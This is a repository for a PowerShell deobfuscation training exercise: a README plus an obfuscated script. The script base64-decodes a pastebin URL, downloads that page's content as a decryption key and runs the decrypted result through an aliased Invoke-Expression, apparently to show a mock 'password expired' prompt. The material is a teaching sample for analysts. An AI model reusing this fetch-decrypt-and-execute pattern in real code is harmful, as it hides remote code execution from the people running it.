├── README.md ├── deobfuscation_walkthrough.pptx └── ps_deobfuscate_excercise.ps1 /README.md: -------------------------------------------------------------------------------- 1 | # PowerShell Deobfuscation Exercise 2 | An exercise to practice deobfuscating PowerShell Scripts. 3 | 4 | The variable and function name make sense once you deobfuscate a little bit! I think I'm funny 🤣 5 | 6 | You can cheat and take out the last line and run the script to get the answer. The PowerPoint walks through each step though and has the answer at the end. 7 | 8 | OR 9 | 10 | TL;DR 11 | ![deobfuscate_answer](https://user-images.githubusercontent.com/22669390/215233904-975bc64e-9aeb-45fa-9a86-f435a58ac4cf.gif) 12 | 13 | 14 | ---- 15 | [@Cyb3rDefender](https://twitter.com/Cyb3rDefender) 16 | -------------------------------------------------------------------------------- /deobfuscation_walkthrough.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CyberDefend3r/PowerShell-Deobfuscation-Exercise/7e24ad832b67a046f7b1dbe02992f9c45c1f0447/deobfuscation_walkthrough.pptx -------------------------------------------------------------------------------- /ps_deobfuscate_excercise.ps1: -------------------------------------------------------------------------------- 1 | set-alias -Name i-am-sprinkles-the -Value IeX 2 | 3 | function rainbow($sunshine) { 4 | $glitter = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($sunshine)) 5 | return $glitter 6 | } 7 | 8 | function butterfly { 9 | $kisses = 'aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3dMMFFYcXJx' 10 | $monarch = '76492d1116743f0423413b16050a5345MgB8ACsATgB1AGwATgBKAHAASwBaAFIAWABFAHcAVQBNAFUAQQBaAHoAOABrAGcAPQA9AHwANwBiADAAOAAwAGMAZgA3ADcANgA2ADIAMABjADkANwA2ADUANwA5ADAAZQAxAGUANwA0ADAAOQAzADUAMQBiADIANgAwAGQAMAA3ADgANgA1ADEANwAwADUAOQBhADIANwAzAGYAZQA1ADgAYgA3ADgAYgAzAGQANgBiAGUANABiADEAMgAzAGMAYQAxADMANgBjADAANwBhADkANwA0ADYAMAA1ADYAYgBjAGQAOQBmADQANAAxAGEAYgAwADIANAAzADkAOQBkAGMAZQA3ADAANQAwADkAZAA5ADEAYQA0ADAAZgA3AGEAMgBlAGIAYgBmADQAZgBlADgAZQBhADEAOABkADMAOQBhAGQAMABkADYAYQA3ADkANAAxAGYAZQAyADUAYwA5AGIAYwA2ADgAYwA1ADQANABkAGUAZgBjADMAMAA2AGUAYQBlADIAYQA0AGEAYQBlADcAYQBjADUANQA0ADgAZABiADkAMQBmADEAOQAyADcAZgA0AGUAOABmADYAOQBlAGIAOAAzAGEAZAA3ADAAZgBjADYAZABkADgAZABmAGYAMQBhADQAZgBiADAANAAzAGUAMAA1ADQAMAA3ADMAMABkADUANgA3ADEAYgBmADkANQAwADYANAA5AGQAMAAzADQAYwA3AGIAOQAxADcAMQBjADYAZAA2AGMAZABkADYAMwBjADAAZAA0AGMAZAAxADAAYQAwAGEAZQAwADEAOQAxAGEAMQAyAGQANABkAGIANQBmAGMANwA4AGUANgA0ADEAZgA4ADcAMABhAGYAYgAxADEANQBhAGMAYgAxAGIAOAAyADcAMQA2ADAANQA3ADEAZQAzADgAYgBjADYAOAA5AGUANQA4AGYAOQBlAGYAYgAyADAAYgBjADIAMQAwADgAZQAwADgAZgA2AGEANgA4AGEAMQA1AGQAZgBlADIAZgBhADMAOAAxAGMANQBjAGIAZQAwADUANAAwADEAMQAwAGYAZgBiAGUANQA4ADQAMwBkADcAZAA4AGUAMAA3ADEAMwAzAGYAOQA2ADgAOABkAGEANAAxAGYAMgAxAGYANwA5ADEAZABhADUAYwAzADYAOQAzADgAMwBiAGUANQAzAGIAMABkADIAZABjAGQAYgBkAGQANgBlADMAMgA4AGIAZgA4ADkAOAAwADIANgA1ADYAZgAwAGUAYwA2AGUAMgBkAGEAMgBiADIAMAA4ADEAZQAyADEANQA1AGMAZABhADkAMABhADYAZQA5AGQAMAA0ADYAZgBhADUAYQAzADkAYgA4AGYAOQBhADkAMwBkADQAZgAyADMAYQA0ADAANgAwADUAMwA4ADkAZgAwADIANwAyAGIAZgBhADQAYgA4ADYANgAyAGUANwA1ADYAZABkADYAMgA0AGUAZQBhADkAOAAyADAAYQBjAGYAYQAyAGUANwA5AGIAYgA5AGQAZABiADIANgBjAGQAZAA3ADIANABhADYANwBmADkANABjADcAMgBmADUAOAAzADYAMwBhAGUAOABlADgAMQAwAGIANAA0ADgAMwAyAGEANgAyAGMAZQA3ADUAMwAwADcAMwA1ADgAMAAyAGIAYwBkAGYAOABjADQANwA4ADIAMgBjADkAMAAyADAANQBkAGIAMgBlADEAYQBjADQAZABlADkAMwBiADkAMwAwAGYAMQBkAGMAMQA2AGYAZgA0ADUANwBiAGEAYwBlADQAZQA3ADQANgA4AGEAMAA1AGQANwBmADkAOQAzADgANQA5ADQAYQA0AGMAZgAxADMAZgBjADUANgA2ADMANgBmADIAMAAwADYAOQBjAGQAYQBmADYAOABiADQAZQA5AGEANwA2AGMAZQBmADUAZQBlAGUAMQA2AGEAZABlADIAMgAyADEAMQA5AGYAOQAxADAAOAA2AGEANwBmADQAMwA3ADMAZQAzADIAZgBkADMAOABjAGQAOABlAGEAYgBjADUAZABjAGIAYgBlAGYAMABkADkAYgA1AGIAYwBlAGEAMwA2ADEAMQBiADEANQAxADUANwBiADEAOQA4ADAAYQBjADgAYwA0AGEAOQBlAGYAZQA1AGQAYQA3ADgAYQA4AGYAOQA5AGEANgBkAGYAYgA3AGEAMwBlADMANgBkAGYAOAA2ADIAMwBkADAAMgBlADgAZAA0AGUAMgA2ADkAMwA4AGUAYwBlAGQAMABlADIAMwA5ADIAZQBjADgANQBiADkAZgA5ADUAZABjAGUAMwBjADkANQBjADkANwA4AGEANwBmADQAMABlAGYAMgBhADcAOQAzADgANABiADUANAA1AGUANgAzAGMAMgBiADEAYwAyADMAYwA3ADgAMgA5ADYAZQAyAGEAMgAyADEAMwA1AGQANgAwADkAZgAyADIAOQBmADkAYgA1AGQAMwBiADYAMwAwADEAMgAwADAAZgAyADgANgBiADYAYQA0AGUAMQAwAGYAYwBjADcAYwBhAGUAYgA2AGEAYwAzADYAZABiADIAMQA3AGMAOQBlADIAMwBiADYAZABjADgANQA4AGUANAA2AGEANQBhADQANQBjAGUAOQBkADQAOQBmADcANQAzAGQAOAAzADUAOAAzADcAMQAzADcAMQBjAGYAYwAyADEANABlAGUAZQAzAGMAYwA0ADgAYgBlADEAMAAyADQAZQA1ADgANAAxADYAMQAyAGMAMwAzAGYAMABjAGYAZQAwADkANwA3ADYAYgA3ADMAMgAxADQANgBhAGIAYwBkADEANAA2ADMAZgA0AGMAZAA4AGEANQBjADQA' 11 | $flower = &('{2}{0}{1}' -f 'E', 'X', 'I')((New-Object System.Net.NetworkCredential("", (ConvertTo-SecureString -k ((&('{2}{0}{1}' -f 'w', 'R', 'I') (rainbow $kisses) | Select-Object -ExpandProperty Content) -split ',') $monarch))).Password) 12 | $colorful = $flower -split '' 13 | return $colorful 14 | } 15 | 16 | function pony { 17 | $trot = butterfly 18 | $01 = ($trot[69], $trot[8], $trot[22], $trot[4], $trot[26], $trot[22], $trot[65], $trot[13], $trot[120], $trot[13] -join '') 19 | $02 = ($trot[2]) 20 | $03 = ($trot[15]) 21 | $04 = ($trot[45]) 22 | $05 = ($trot[2]) 23 | $06 = ($trot[118], $trot[119], $trot[119], $trot[119], $trot[119] -join '') 24 | $07 = ($trot[2]) 25 | $08 = ($trot[15], $trot[48] -join '') 26 | $09 = ($trot[27]) 27 | $10 = ($trot[118]) 28 | $11 = ($trot[39]) 29 | $12 = ($trot[33], $trot[35], $trot[2] -join '') 30 | $13 = "PASSWORD EXPIRED" 31 | $14 = ($trot[2], $trot[15], $trot[4] -join '') 32 | $15 = ($trot[2]) 33 | $16 = "Click here to change now." 34 | $17 = ($trot[2], $trot[15], $trot[3] -join '') 35 | $18 = " 10" 36 | $19 = ($trot[2]) 37 | $20 = ($trot[15], $trot[164] -join '') 38 | $21 = ($trot[2]) 39 | $22 = "https://acegif.com/wp-content/gif/unicorn-80.gif" 40 | return ($01, $02, $03, $04, $05, $06, $07, $08, $09, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19, $20, $21, $22) 41 | } 42 | 43 | function unicorn { 44 | $little = pony 45 | $fly = '' 46 | Foreach ($sky in $little) { $fly += $sky } 47 | return $fly 48 | } 49 | 50 | i-am-sprinkles-the(unicorn) --------------------------------------------------------------------------------